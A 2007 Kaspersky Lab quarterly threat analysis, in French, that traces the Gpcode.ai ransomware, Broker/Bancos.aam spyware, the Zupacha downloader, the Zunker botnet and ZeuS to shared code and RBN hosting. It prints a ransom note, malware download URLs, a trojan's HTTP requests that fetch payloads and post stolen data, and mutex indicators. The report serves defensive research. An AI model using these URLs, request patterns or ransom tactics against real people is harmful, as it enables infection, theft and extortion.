Toutes les Menaces

Virus

Hackers

Spams

Whole site    Viruses
  
Encyclopédie Virus
Alertes
Analyses
Actualité
Glossaire

 
Calendrier

<< 2014  
Jan Feb Mar
Apr May Jun
Jul Aug  
     
Les Analyses les plus Populaires



Opération Epic Turla : résolution de certains des mystères de Snake/Uroburos



Evolution des menaces informatiques au 2e trimestre 2014



Courrier indésirable et phishing au deuxième trimestre 2014



10 astuces simples pour renforcer la sécurité de votre Mac



Courrier indésirable en juin 2014
 
 

  Page d'accueil / Analyses

Menaces informatiques modernes, troisième trimestre 2007

30.11.2007   |   comments (2)

Alexander Gostev
Expert Antivirus Senior, Kaspersky Lab
Vitaly Kamluk

Le troisième trimestre 2007 a été moins riche en événements que prévu. Bien entendu, les programmes malveillants n'ont pas cessé d'exister et les auteurs de virus ne se sont pas reconvertis. Tout simplement, l'ampleur des événements survenus au cours de ce troisième trimestre a été bien inférieure à celle des années ou des mois précédents.

Ceux d'entre vous qui se rappellent les épidémies mondiales provoquées par Mydoom et Lovesan doivent penser que le flux incessant de chevaux de Troie identiques qui envahit Internet est monotone : on pourrait penser, à première vue, que les individus mal intentionnés ont abandonné les attaques d'envergure et l'introduction de nouveautés. Il existe toutefois une explication toute simple à ce calme apparent : la cybercriminalité est devenue plus professionnelle et à ce titre, elle veille à ne pas attirer l'attention. La moindre agitation à propos d'une épidémie de virus va immanquablement entraîner une enquête de la part des autorités judiciaires. Silence et discrétion sont les règles d'or des individus qui se trouvent de l'autre côté de la loi. Quant aux grandes nouveautés techniques dans le milieu, elles sont rares. Les groupes criminels et les technologies reposent sur des mécanismes de fonctionnement qui ont fait leurs preuves il y a longtemps.

Il arrive parfois que la volonté de gagner un maximum d'argent, en d'autres termes la cupidité, associée à un faible niveau de connaissances techniques chez les auteurs de programmes malveillants forment un maillon dans la chaîne. Alors la "guerre invisible" tombe sous le feu des projecteurs des médias et le grand public est informé.

Quels seront les événements du troisième trimestre 2007 qui resteront dans l'histoire de cette "guerre" ? Une multitude d'incidents impliquant le vol de données d'utilisateurs. L'apparition d'un nouveau cheval de Troie escroc. L'hystérie collective vis-à-vis de Russian Business Network (RBN), une société d'hébergement "blindé", qui est rapidement devenue pour les utilisateurs traditionnels le "l'antre du Mal" et le "foyer de toutes les attaques de pirates informatiques au monde".

Dans ce contexte, les informations relatives à l'augmentation de la taille des réseaux de zombies, toujours liés au ver Zhelatin (Storm Worm) sont passées inaperçues. Même les déclarations explosives sur le fait que le "réseau de zombies d'assaut" avait dépassé la barre des deux millions de machines infectées n'ont pas suscité un intérêt particulier. Nous voici revenus au silence et à la discrétion.

La "ligne de front" se situe désormais à un autre niveau de confrontation que les médias ne présentent pas.

C'est ainsi que certains des événements du troisième trimestre traités par la presse ont attiré notre vive attention. Aussi étonnant que cela puisse paraître, l'étude d'un incident nous a mené vers d'autres incidents qui venaient à peine de se déclencher et qui, pour un observateur externe, auraient pu paraître sans aucun rapport avec le reste.

Ce rapport trimestriel est inhabituel dans la mesure où il a été rédigé sur la base d'une enquête d'envergure et qu'il n'aborde pas uniquement tous les événements intéressants du trimestre mais il explique également ce que nous devons faire et présente exactement le travail des spécialistes de la lutte contre les virus.

Le retour du « codeur »

Les chevaux de Troie de cryptage des données n'ont fait aucune apparition depuis un an. Notre article intitulé "Le maître chanteur" racontait en détail la lutte des éditeurs de logiciels antivirus contre Gpcode qui chiffraient les données des utilisateurs à l'aide d'un algorithme RSA et nous avions prédit l'augmentation du nombre de ce genre de programme. Toutefois, ce n'est que vers le milieu du mois de juin 2007, près d'un an plus tard, que le crypteur a fait sa réapparition.

Dès le 13 juin, certains utilisateurs ont remarqué que leurs documents, photographies, archives et documents de travail refusaient de s'ouvrir et affichaient un "charabia numérique" tandis que des fichiers baptisés read_me.txt apparaissaient dans le système de fichiers. Le contenu de ces fichiers était malheureusement prévisible :

Hello, your files are encrypted with RSA-4096 algorithm (http://en.wikipedia.org/wiki/RSA).
You will need at least few years to decrypt these files without our
software. All your private information for last 3 months were
collected and sent to us.
To decrypt your files you need to buy our software. The price is $300.
To buy our software please contact us at: xxxxxxx@xxxxx.com and provide us
your personal code -XXXXXXXXX. After successful purchase we will send
your decrypting tool, and your private information will be deleted
from our system.
If you will not contact us until 07/15/2007 your private information
will be shared and you will lost all your data.
Glamorous team

Le maître-chanteur mystère était-il de retour ? L'adresse de messagerie reprise dans le texte n'était pas inconnue des spécialistes de Kaspersky Lab qui l'avaient rencontrée dans certaines variantes des chevaux de Troie LdPinch et Banker. Ces chevaux de Troie avaient une origine russe clairement marquée.

L'étude des fichiers codés réalisée par nos experts démontra que malgré ce que prétendait le message, l'auteur du virus avait utilisé non pas l'algorithme RSA mais bien une modification de l'algorithme RC4, ce qui facilita grandement notre travail. Moins de 24 heures s'écoulèrent entre la découverte du cheval de Troie maître-chanteur et le déchiffrement du code et la diffusion de l'outil de déchiffrage dans nos bases antivirus.

L'analyse de la nouvelle version de Gpcode(analysis?pubid=189121344) mit en évidence le caractère multifonctionnel potentiel de ce programme malveillant. Outre le chiffrement, Gpcode pouvait voler les données personnelles des utilisateurs des machines infectées, les envoyer vers le serveur des individus mal intentionnés et télécharger certains fichiers depuis ce serveur.

Conscients de la menace que représentaient les chevaux de Troie crypteurs, il fut décidé d'étudier plus en détail ce nouveau programme malveillant qui fut baptisé Gpcode.ai. Et ce ne fut pas en vain !

Sur les traces de Gpcode.ai

Notre enquête allait se dérouler selon trois directions principales :

  • Le serveur vers lequel le cheval de Troie envoyait les données et duquel les fichiers étaient téléchargés (http://martin-golf.net) ;
  • Les adresses de messagerie indiquées par les individus mal intentionnés dans les messages laissés sur les systèmes infectés ;
  • La ligne de texte dans le corps du cheval de Troie, «_SYSTEM_64AD0625_»_ (ligne d'identification créée par le cheval de Troie pour identifier sa présence dans la mémoire de l'ordinateur).

Le serveur

Nous avions compris que Gpcode.ai se connectait au serveur à l'aide du script s.php qui se trouvait sur ce serveur. De plus, il téléchargeait depuis le serveur le fichier cfg.bin qui contenait un ensemble chiffré d'instructions relatives aux informations à récolter sur les ordinateurs (données d'accès à divers banques et systèmes de paiement en ligne).

Les experts de nombreux autres éditeurs de logiciels antivirus réalisèrent en parallèle une analyse identique. Les représentants de PrevX donnèrent l'alerte après avoir découvert sur le serveur des individus mal intentionnés des fichiers de 494 ordinateurs infectés et ils firent des déclarations tonitruantes dans lesquelles ils expliquaient que certaines grandes entreprises figuraient parmi les victimes de l'escroc. Mel Morris, directeur général de PrevX, alla même jusqu'à citer le nom de certaines d'entre elles : American Airlines, Booz Allen Hamilton et le ministère des Affaires étrangères des Etats-Unis. Aucune des "victimes" dévoilées ne réagit aux déclarations de Morris.

Les représentants d'autres éditeurs de logiciels antivirus n'acceptèrent pas vraiment les déclarations de PrevX. David Parry, de Trend Micro, déclara que d'un point de vue déontologique, il était "troublé" par la volonté de PrevX de traiter ces données avec tant de transparence. Alors que les principaux éditeurs de logiciels antivirus évitaient de publier les moindres coordonnées (adresses des serveurs et adresses de messagerie) des individus mal intentionnés, en les supprimant dans le code utilisé pour décrire le virus (cette méthode, comme nous en avons déjà parlé, déboucha sur quelques situations amusantes), PrevX décida de dire au monde entier où se trouvaient ces données personnelles et à qui elles appartenaient.

Après ces déclarations, le site martin-golf.net fut littéralement pris d'assaut par les experts en sécurité informatiques, par les pirates informatiques, par les représentants des autorités judiciaires de nombreux pays et par de simples curieux. Les chances de mener la moindre enquête sur cet incident furent ruinées ; les individus mal intentionnés savaient qu'ils étaient observés et dans ces conditions, l'observation n'avait plus beaucoup de sens.

Cette voie était donc sans issue et notre attention se déplaça vers les adresses de messagerie.

Adresse de messagerie

Nous voulions savoir comment se déroulait la communication entre l'individu malveillant et ses victimes, du moins celles qui avaient décidé de le contacter et de payer la somme demandée afin de pouvoir récupérer leurs données. C'est ainsi que nous avons envoyé un message à une des adresses reprises dans le cheval de Troie. Ce message fictif disait :«Je m'appelle John Brown et je suis un simple employé. Mes données importantes sont chiffrées. J'en ai besoin pour rédiger un rapport urgent et si je ne le fais pas, mon patron va me tuer.». Le lendemain, nous recevions la réponse des individus mal intentionnés inconnus.

Sorry for delay.
Please transfer $500 to e-gold account 4616329 and send us a e-mail to
address oxyglamour@gmail.com. You can buy e-gold with paypal with help of
exchange site listed on official e-gold site (http://www.e- gold.com/unsecure/links.htm#marketmaker).
After that, we will send your personal decoding program immediately

Ce message indiquait clairement que les auteurs de Gpcode.ai demandaient 500 USD et non plus 300 comme il était indiqué dans le texte du fichier créé par le cheval de Troie. Le transfert de l'argent devait se faire via e-gold, le système favori des cybercriminels. Le message indiquait le numéro de compte e-gold sur lequel l'argent devait être déposé.

Toutes les possibilités dans cette direction de l'enquête avaient été envisagées et il ne restait plus rien à étudier.

La ligne «_SYSTEM_64AD0625_»

Le seul point qui restait à l'ordre du jour était de tenter d'identifier les autres programmes malveillants qui auraient pu être créés par le groupe qui s'était baptisé "Glamourous team". Nous commençâmes à chercher la ligne «_SYSTEM_64AD0625_» dans notre collection de virus.

Les résultats furent pour le moins inattendus. Cet identificateur figurait dans les chevaux de Troie les plus divers ! On retrouvait des chevaux de Troie téléchargeur, des chevaux de Troie espion et des portes dérobées.

Le dénominateur commun partagé par ces différents échantillons était le nom du fichier sous lequel ces programmes s'installaient dans le système : ntos.exe, un fichier parfaitement identique au nom du fichier dans Gpcode.ai. De plus, ils contenaient des fichiers baptisés sporder.dll et rsvp322.dll, ils créaient également un sous-répertoire wsnpoem contenant les fichiers audio.dll et video.dll dans le répertoire système Windows.

L'analyse détaillée de certains des fichiers sélectionnés montraient qu'outre la ligne d'identification, ils partageaient plus de 80% du code !

Code "universel"

Nous nous trouvions face à ce que nous devions appeler un code universel. Ses fonctions étaient axées sur le vol de données et sur le téléchargement de nouveaux chevaux de Troie dans le système. Il était capable de remplir les fonctions d'un bot et de connecter l'ordinateur infecté à un réseau de zombies.

Les programmes malveillants créés sur la base de ce code universel possèdent une fonction unique et petite (par comparaison à la taille du fichier) qui change selon la variante du programme. Il est intéressant de constater que nous avons découvert certains de ces programmes déjà à la fin de l'année 2006. Ce code "universel" est intervenu également pour la création du "crypteur" Gpcode.ai.

Notre schéma d'enquête accueillait de nouvelles entrées et de nouvelles dépendances.




Mauvaise compagnie

L'étape suivante de notre enquête portait sur l'analyse des liens contenus dans les différents exemplaires du code "universel". Nous avons pris le fichier découvert le plus récemment et nous en avons extrait quatre liens utilisés par le programme malveillant pendant son "travail".

http://81.95.149.28/logo/zeus.exe
http://81.95.149.28/logo/zupa.exe
http://myscreensavers.info/zupa.exe
http:/81.95.149.28/logo/fout.php

Que fait donc ce cheval de Troie ? Tout d'abord, lui aussi s'installe comme ntos.exe puis télécharge les fichiers zeus.exe (http://81.95.149.28/logo/zeus.exe) et zupa.exe (http://81.95.149.28/logo/zupa.exe) avant de se connecter via le script fout.php (http:/81.95.149.28/logo/fout.php) pour s'identifier dans le réseau de zombies. Le cheval de Troie télécharge le fichier de configuration cfg.bin qui est chiffré. Ce fichier contient des messages et des liens vers d'autres sites. Le programme malveillant commence à surveiller l'activité de l'utilisateur sur Internet et lorsqu'il visite des forums, des livres de visite ou des blogs, il publie son propre texte (extrait de cfg.bin) contenant le lien vers le programme malveillant (http://myscreensavers.info/zupa.exe) à la fin du message publié par l'utilisateur.



Exemple de message malveillant


Nous avons essayé de trouver d'autres exemples similaires via Google et cette recherche donna de nombreux résultats :



Grâce à ce mode d'attaque, les auteurs des chevaux de Troie peuvent utiliser des ordinateurs préalablement infectés afin de diffuser de nouvelles versions de programmes malveillants et/ou d'augmenter le nombre d'ordinateurs infectés. Ceci est un exemple frappant du rejet par les individus mal intentionnés des méthodes traditionnelles de diffusion des programmes malveillants par courrier électronique au profit de l'utilisation des technologies modernes d'Internet.

Mais quels furent donc les programmes malveillants diffusés par le cheval de Troie que nous avions étudié ? Les informations sont impressionnantes :



A première vue, ces familles de programmes malveillants sont différentes et n'ont rien en commun et, comme nous le pensions avant, elles appartenaient à un ou deux groupes d'auteurs de virus et étaient propagées depuis le même site à l'aide du même cheval de Troie téléchargeur. Et tous, d'une manière ou d'une autre, étaient liés au crypteur Gpcode.ai !

La situation était incompréhensible et engendrait de sinistres idées sur un syndicat mondial qui serait responsable de la quasi majorité des programmes malveillants actuels et des épidémies associées.

Nos pires suspicions furent renforcées après l'analyse du réseau de zombies créés à l'aide de Bzub. Tout indiquait que le "parent" direct de Bzub était le cheval de Troie baptisé "Zupacha" par son auteur. Bzub et Zupacha sont pratiquement identiques mais Bzub possède une fonction de cheval de Troie espion, mais pas Zupacha.

Bzub et Zupacha sont des clients bot qui fonctionnent sous le système de réseau de zombies Zunker.

Parmi les autres programmes malveillants qui possèdent une interface pour la connexion et l'utilisation dans le cadre du réseau de zombies Zunker, nous retrouvons Email-Worm.Win32.Zhelatin.bg. Ce ver est un des tristement célèbres "ver d'assaut" qui au début de l'année 2007 ont littéralement inondé le courrier électronique en utilisant les astuces les plus rusées de l'ingénierie sociale pour se diffuser.

Zhelatin, Warezov, Bancos.aam, Bzub et maintenant Gpcode.ai semblaient être liés les uns aux autres. Tous ces programmes appartiennent aux familles les plus diverses des programmes malveillants les plus actifs et les plus dangereux à l'heure actuelle : les fichiers ntos.exe, video.dll, audio.dll, sporder.dll, lcewza.exe, filech.exe, filede.exe, iphone.scr, ldr.exe, ldr2.exe, loader.exe, pajero.exe, update92620748.exe, zeus.exe, zs1.exe sont bien connus des experts de virus du monde entier.

Nous avions commencé à tirer sur un fil et nous nous retrouvions avec une pelote de liaisons mêlées.



Tandis que nous poursuivions nos recherches, les individus mal intentionnés inconnus firent à nouveau parler d'eau. A vrai dire, ils ne recherchaient pas la publicité mais l'événement fut assez remarquable.


Broker

Le 25 juillet 2007 (10 jours après l'apparition de Gpcode.ai), les experts de Kaspersky Lab identifièrent la diffusion active d'un nouveau programme malveillant. Les victimes de cette infection étaient les visiteurs des sites d'informations russes utro.ru, gzt.ru et rbc.ru.

Au cours de l'enquête, nous avons pu confirmer que dans chaque cas, un lien avait été introduit dans le système de bannière d'Utro.ru (http://www.txt.utro.ru/cgi- bin/banner/rian?86028&options=FN) qui proposait, en tant que bannière, un lien vers un site malveillant (http://81.95.145.210/333/m00333/index.php), hébergé sur le tristement célèbre RBN (Russian Business Network).

Quand le navigateur de l'utilisateur ouvrait cette page, il était attaqué par une série de codes d'exploitation (utilisation de MPack, un système très apprécié pour ce genre d'activité). En cas de réussite de l'attaque, un cheval de Troie téléchargeur était chargé dans le système. Par la suite, ce cheval de Troie installait le programme malveillant principal, à savoir Trojan-Spy.Win32.Bancos.aam.

Après avoir été installé dans le système, le cheval de Troie commençait à exécuter les commandes suivantes :

Host: 81.95.149.66
GET /e1/file.php HTTP/1.1
GET /ldr1.exe HTTP/1.1
GET /cfg.bin HTTP/1.0
POST /s.php?1=april_002fdf3f&i= HTTP/1.0

Suite à ces actions, le fichier ntos.exe, dont le nom était déjà connu des spécialistes antivirus, apparaissait dans le système de l'utilisateur infecté : un fichier identique était utilisé lors de l'installation de Gpcode dans le système. Comme nous nous attendions au pire sous la forme de l'apparition d'un nouveau crypteur, nous commençâmes à analyser le fichier en détail.

Ce n'était pas Gpcode. Le nouveau Bancos.aam fut le premier cheval de Troie espion axé sur le vol des données d'utilisateurs du système russe QUIK.

QUIK est une suite logicielle qui permet d'organiser l'accès aux systèmes de transaction de la bourse en temps réel. Les opérations en bourse via Internet sont ce qu'on appelle l'Internet trading. QUIK se compose d'un serveur et de clients sur les postes de travail qui interagissent via Internet.

Nous n'avions jamais été confrontés à des auteurs de virus qui tentaient clairement d'accéder aux systèmes de transactions boursières. Cela faisait longtemps que les comptes d'accès aux banques étaient la cible de nombreuses attaques. Mais les transactions boursières ?

Le cheval de Troie recherchait dans le système les fichiers secring.txk, pubring, txk et qrytpo.cfg dans lesquels étaient renfermées les informations relatives aux paramètres d'accès à QUIK et les transférait vers son propre serveur.

Connaissant le nom des fichiers que le cheval de Troie espion recherchait, nous nous tournâmes une fois de plus vers notre collection de programmes malveillants afin de chercher ces noms. Nous trouvâmes cinq versions de ce cheval de Troie, la toute première remontant au début du mois de juillet. Ils furent tous ultérieurement séparés de Bancos.aam et placés dans une nouvelle famille : Trojan-PSW.Win32.Broker.

Faut-il mentionner que ces chevaux de Troie ressemblaient, par leur code, à Gpcode.ai ? L'unique différence était qu'un volait les données tandis que l'autre les chiffrait. Nous étions à nouveau en présence de ce code "universel".


Bilan intermédiaire

Les faits en notre possession au début du mois d'août étaient les suivants :

  • Gpcode.ai reposait sur un code "universel" et interagissait avec le site martin-golf.net ;
  • Bancos.aam reposait sur un code "universel" et était téléchargé depuis des serveurs de la société d'hébergement "blindé" RBN (Russian Business Network).
  • Plusieurs des réseaux de zombies Zunker que nous avions découverts étaient également basés sur des ressources de RBN.
  • Les réseaux de zombies Zunker sont des centres de gestion pour les chevaux de Troie téléchargeurs qui téléchargent des programmes malveillants semblables à Bancos.aam et Gpcode.ai.
  • Parmi les programmes malveillants qui peuvent être gérés à l'aide de Zunker, on retrouve le téléchargeur Zupach, l'espion Bzub et le vers Zhelatin (Storm Worm).
  • Le ver Warezov fut diffusé par un réseau de zombies similaire.


Le seul élément qui nous manquait était l'identité de l'auteur de ce code "universel" utilisé si fréquemment dans la création de programmes malveillants tellement différents. Nous devions également établir si tous ces incidents n'étaient pas le résultat de l'activité d'un seul et même groupe d'auteurs de virus ?

Nous dûmes consacrer beaucoup de temps à la lecture attentive de divers sites et forums de "pirates", principalement en russe. La situation s'éclaircissait.


A la recherche du code universel

Zunker et Zupacha

A quoi étions donc nous confrontés ? Les sites de pirates informatiques étaient le lieu d'un commerce actif autour de l'association Zunker+Zupacha, le centre de commande et de contrôle du réseau de zombies et le client du réseau. Nous le savions déjà. Ce qui était intéressant, c'était la somme demandée par les auteurs inconnus du système de bot : jusque 3 000 USD. Il y avait parfois des offres de vente de ce "joli couple" pour une somme bien inférieure, aux alentours de 200 USD. Il s'agissait certainement d'autres personnes ayant accès au code source de cet ensemble de cheval de Troie.

Nous n'eûmes aucune difficulté à obtenir rapidement et gratuitement tous les fichiers qui nous intéressaient de Zunker et Zupacha à l'aide de Google et en connaissant l'adresse de quelques réseaux de zombies déjà en fonction.

La fonction complète de Zupacha était assez impressionnante. Outre le téléchargement d'autres fichiers dans le système, sa tâche principale était de se diffuser. Nous avons déjà évoqué une des méthodes utilisées (publication de ses textes dans des forums). Zupacha pouvait se diffuser selon les méthodes suivantes :

  • Spam ICQ\Jabber. Des messages contenant des liens vers les sites malveillants sont ajoutés à tous les messages que l'utilisateur échange avec ses contacts dans ces clients de messagerie instantanée.
  • Spam Internet. Les messages sont ajoutés à n'importe quel formulaire en ligne rempli par l'utilisateur. En règle générale, il s'agit de forums et de l'interface Web des systèmes de messagerie.
  • Messages non sollicités. Le texte est ajouté aux messages des utilisateurs.

Il convient de remarquer que dans tous ces cas, Zupacha ne lance pas lui-même la diffusion des messages via les méthodes décrites. Il se contente de surveiller l'activité de l'utilisateur et il ajoute son texte à n'importe quelle communication sortante sans que l'utilisateur ne le voit ! Ceci vise à ralentir le processus de découverte de l'infection.

Toutefois, Zupacha ne vole pas de données. Il n'est qu'un cheval de Troie téléchargeur capable de se diffuser de manière autonome. Par conséquent, il n'aurait pas pu être la base du code "universelle".

La réponse à la question qui nous intéressait vint de la poursuite de l'analyse de l'offre en programmes malveillants : le code "universel" utilisé dans des centaines de variantes de Bancos.aam, Gpcode.ai et Broker était le bot ZeuS (titre de l'auteur)


ZeuS – Zbot

Les informations que nous avons recueillies sur les modifications de ZeuS que nous possédions et lors de nos propres "enquêtes" sur Internet, nous donnèrent une représentation quasi complète de ce qui se passait.

Tout d'abord, ce réseau de zombies était, dès le début, prévu pour la vente à toute personne intéressée et il était configuré pour chaque client. L'auteur lui-même n'offrait pas "l'assistance technique" à l'acheteur et transférait cette fonction à d'autres personnes. Après les vagues créées par Gpcode.ai et Broker, l'auteur s'était probablement dit que ses actions avaient attiré trop l'attention des autorités judiciaires et déclara sur un site qu'il suspendait les ventes.



Cette histoire n'est pas sans rappeler les incidents de la fin de l'année dernière impliquant le vol des données des clients de la banque Nordea lorsque le cheval de Troie Nuclear Grabber aux fonctions similaires (vendu à l'époque pour 3 000 USD) fit surface et que son Corpse, son auteur, accorda même une entrevue à un journaliste. Par la suite, Corpse déclara sur son site qu'il "arrêtait ses activités" et que "tous les textes sources ainsi que le disque dur avaient été brûlés" et qu'il ne s'impliquerait plus dans la création de programmes malveillants et dans l'assistance technique dans ce milieu.

Dans le cas de ZeuS, le scénario était similaire. Même si son auteur avait également suspendu ses activités vers la fin du mois de juillet, il circulait parmi les pirates un constructeur capable de produire de nouvelles versions du bot avec cette fonction. Plusieurs groupes concurrents se mirent à les vendre et à les distribuer.

Au départ, la fonction de ZeuS en tant que bot était assez limitée : il se contentait de télécharger d'autres fichiers dans le système. Il s'est développé au fil du temps. Nous ne savons pas si ces ajouts furent l'oeuvre de l'auteur ou s'ils sont le fruit du travail des nouveaux "propriétaires" des codes sources. La principale nouveauté fut l'apparition dans ZeuS d'une interface "universelle" lui permettant, tout comme Zupacha, de se connecter au réseau de zombies Zunker, de recevoir les instructions via le fichier cfg.bin et de les exécuter au vol.

Nous avons mis au point un programme pour déchiffrer certains des fichiers de cfg.bin. Ils contenaient une multitude d'adresses Internet de banques et de systèmes de paiement. Les propriétaires du réseau de zombies pouvaient ajouter efficacement des nouvelles cibles pour surveiller l'activité des utilisateurs et intercepter les données.

Outre les procédures standard d'installation dans le système, d'injection dans les processus exécutés, de lutte contre certains logiciels antivirus et en plus de la présence de serveur proxy socks et http, ce bot contient une puissante procédure de vol d'informations :

  • le cheval de Troie vole le contenu de Protected Storage où se trouvent les mots de passe de l'utilisateur.
  • Formgrabber. Le cheval de Troie intercepte toutes les données saisies dans un formulaire et envoyées via un navigateur. La liste des adresses surveillées pour lesquelles l'information doit être interceptée est composée généralement de banques et de systèmes de paiement. C'est ainsi que les données d'accès au compte sont volées.
  • Contournement des claviers virtuels. Le cheval de Troie intercepte les clics de la souris et prend des captures d'écran à ce moment.
  • Remplacement de sites et de page. Cette méthode très intéressante était jusqu'alors utilisée exclusivement dans Nuclear Grabber. Lorsque l'utilisateur tente d'accéder à un des sites repris sur la liste de surveillance du cheval de Troie, la requête est soit redirigée vers un site fictif, soit un nouveau champ de saisie d'information est ajouté à la page originale. Le contenu de la page est modifié directement sur l'ordinateur de l'utilisateur avant son affichage dans le navigateur !

Vol de certificats.



Le trait distinctif qui nous a permis de rapidement identifier des variantes de ZeuS dans notre collection est la ligne d'identification (mutex) qu'il utilise pour identifier sa présence dans la mémoire de l'ordinateur - _SYSTEM_.

Par exemple :

__SYSTEM__91C38905__
__SYSTEM__64AD0625__
__SYSTEM__23D80F10__
__SYSTEM__7F4523E5__
__SYSTEM__45A2F601__

Nous avons pu ainsi répartir toutes les variantes de ZeuS dans une famille indépendante baptisée Zbot.

Il s'agit effectivement d'un code universel qui vole n'importe quelle information à l'aide d'une multitude de méthodes originales. Et le plus dangereux, c'est que chaque nouvelle modification peut être enrichie des fonctions les plus diverses, comme ce fut le cas avec Gpcode.ai.


Trois « Z »

Tout était clair maintenant. Une norme composée de la paire Zupacha+ZeuS et du réseau de zombies Zunker qu'elle gérait avait fait son apparition dans la communauté des cybercriminels russophones.

Les réseaux de zombies constitués à l'aide de ces programmes sont impressionnants. Un des réseaux les plus importants créés à l'aide de Zunker comptait, au moment de sa découverte, plus de 106 000 ordinateurs et son rythme de croissance était de 1 500 ordinateurs par jour ! L'efficacité de la propagation de Zupacha provenait de la simplicité de sa configuration et de l'utilisation d'un centre de commande.

N'importe quel individu mal intentionné, même un débutant pouvait acheter ces deux chevaux de Troie (ZeuS et Zupacha) dans une configuration adaptée à un client en particulier. Ensuite, il devait louer un serveur quelque part et y installer le tableau de bord du réseau de zombies, à savoir Zunker. Il va sans dire que dans de nombreux cas, son choix se portait sur l'hébergeur Russian Business Network qui apparaît constamment dans la presse depuis six mois et qui a acquis en Occident la réputation de véritable "antre du Mal".



Nous n'étions pas tellement intéressés par RBN mais bien par ses clients et les réseaux de zombies qu'ils utilisaient. Comme nous savions ce que nous cherchions et où le chercher, nous n'eûmes aucune difficulté à découvrir plusieurs de ces systèmes (cf. illustrations ci-dessus).

Nous pouvons affirmer sans crainte que certains de ces réseaux de zombies Zunker ont contribué à la diffusion de programmes malveillants aussi dangereux que les vers d'assaut Zhelatin et Warezov. Il se peut que les auteurs de ces programmes aient eux-mêmes créés des réseaux de zombie sur la base de Zunker+Zupacha ou qu'ils aient tout simplement "loué" la puissance des réseaux déjà en place en payant les propriétaires pour la diffusion de leurs vers.

Il est intéressant de constater que lorsque le cheval de Troie Zupacha est tombé entre les mains de pirates informatiques occidentaux, ils ont été impressionnés par le concept et se sont mis à l'analyser et à en débattre dans divers forums (http://www.ryan1918.com). Ils apprirent à modifier l'adresse du centre d'administration dans le fichier binaire du cheval de Troie afin de pouvoir l'utiliser à leurs propres fins malgré l'absence des codes sources. Ils essayèrent même de construire un centre d'administration avec une base de données contenant les paramètres du cheval de Troie. Plus tard, un de ces pirates mit la main sur le code du centre d'administration et sur la structure de la base de données, ce qui donna un coup d'accélérateur à l'ensemble du processus. Toutes les personnes intégrées à cette affaire (analyse du cheval de Troie russe et utilisation de "l'arme de la mafia russe") ont participé au développement, à la diffusion et à la popularisation de Zupacha.


Conclusion

Toutes les informations présentées ici illustrent le mode de fonctionnement du milieu cybercriminel russophone et les relations au sein de celui-ci. Des auteurs et des groupes distincts créent des chevaux de Troie qu'ils vendent tandis que les acheteurs les configurent selon leurs besoins, les rendant parfois méconnaissables. Les machines infectées sont unies au sein de réseaux de zombies qui peuvent compter des centaines de milliers d'ordinateurs infectés et ces réseaux sont commandés au départ de centres programmés par d'autres individus mal intentionnés qui les vendent également. Ces mêmes réseaux de zombies peuvent être utilisés pour diffuser les programmes malveillants les plus divers et bien souvent, ils se font concurrence. Afin que tout cet écosystème puisse exister le plus longtemps possible malgré les efforts déployés par les autorités judiciaires et les éditeurs de logiciels antivirus, il existe des sociétés d'hébergement "blindé" qui offrent leurs services pour des sommes variées allant de quelques dizaines de dollars à plusieurs milliers de dollars par mois.

Tout ce secteur engrange un certain revenu car il existe une offre de services de création et de diffusion de chevaux de Troie et une demande croissante. Nous n'avons dévoilé qu'une infime partie de l'iceberg qui concerne uniquement les groupes de pirates informatiques russophones. Il est évident qu'il existe d'autres groupes dans le monde : en Amérique latine, en Chine, en Turquie, etc. Chacun de ces groupes se livre à une activité spécifique mais dans l'ensemble, ils se ressemblent. Internet ne connaît pas de frontières.

Un autre exemple qui vient confirmer tout ce qui a été dit nous est fourni par une information en date du 17 août 2007 (http://www.informationweek.com/news/showArticle.jhtml?articleID=201800958). Nous nous permettons de la citer en entier :

Security researchers have unearthed the single largest cache of stolen identities, thanks in part to a Trojan stealing the data that has been hidden in a fraudulent advertisement on online job sites like Monster.com.
Don Jackson, a researcher with security company SecureWorks, told InformationWeek that he found 12 data caches connected to one group using the latest variance of the Prg Trojan, which also is known as Ntos, Tcp Trojan, Zeus, Infostealer.Monstres, and Banker.aam. Several of the 12 found caches contain information on about 4,000 to 6,000 identity theft victims, but one contains about 10,000 and the largest one contains 46,000.
He estimates that between the 12 caches, there probably is information on about 100,000 stolen identities.

Vous avez certainement deviné de quel cheval de Troie il s'agissait, la manière dont il volait les données et peut-être même l'endroit où elles étaient envoyées ? Oui, il s'agissait bien de ce code "universel" : ZeuS ! Et les données étaient envoyées vers des serveurs chez RBN.

Source:
Kaspersky Lab
 

Copyright © 1996 - 2014
Kaspersky Lab
Industry-leading Antivirus Software
All rights reserved
 

Email: webmaster@viruslist.com